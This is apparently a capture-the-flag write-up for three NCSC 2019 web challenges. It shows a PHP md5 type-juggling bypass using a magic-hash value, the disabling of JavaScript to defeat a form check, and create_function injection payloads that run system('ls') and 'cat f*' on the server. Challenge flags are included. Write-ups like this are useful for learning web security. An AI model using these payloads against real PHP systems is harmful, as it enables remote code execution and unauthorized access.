NCSC 2019 - web0, web1, halfline

web0

We were given a page with the following source code

<?php
if (isset($_GET['source']))
    highlight_file(__FILE__) and die();
if (isset($_GET['md5']))
{
include('./private/flag.php');     
    $md5=$_GET['md5'];
    if ($md5==md5($md5))
        echo "<br>WP ! Here is your flag: <br>" . $flag;
    else
        echo "Nah.. Incorrect Answer"; 
}
?>

The condition to show the flag is $md5==md5($md5). Due to the use of the == operator, we went in the type juggling direction.

We know that if two strings are in the form “0eX” where X is numeric, == will cast them to $0 * e ^{X}$. Meaning that they will both be equal to 0 at evaluation time.

We wrote a php script to find out a string in the form “0eX” that have an md5 in the same form.

<?php

$i = 0;
while (true) {
  $str = "0e$i";
  $hash = md5($str);
  if ($str==$hash) {
    var_dump($str, $hash);
    break;
  }
  $i++;
}

After few seconds, it gave us the following result:

$ php type.php
string(11) "0e215962017"
string(32) "0e291242476940776845150308577824"

then,

WP ! Here is your flag: Securinets{Gg!H4K3Rm@N}

web1

We were given a script that prevents you from selecting all checkboxes in a form.

Inspect => Settings => Disable Javascript.

:p

Good job, take your flag: Securinets{HuNgRY_Pl4y3r}

halfline challenge

We were given a page with the following source code.

<?php
error_reporting(0);
highlight_file(__FILE__);

$_ = $_GET['_'];
$__ = $_GET['__'];

$_('', $__);
?>

Our intuition was to find a function that accepts a mixed param as first arg and a callback as the second.

We found out this stackoverflow thread that contains exploitable PHP functions.

After some time, we only restricted the search on the create_function function.

On the php website we found this Caution:

This function internally performs an eval() and as such has the same security issues as eval(). Additionally it has bad performance and memory usage characteristics.

We searched for exploits and we found the following EDB-ID 32417.

So, we used the following payloads to get the flag:

?_=create_function&__=return 0; } system('ls'); //

?_=create_function&__=return 0; } system('cat f*'); //

We got an image and strings got us the flag.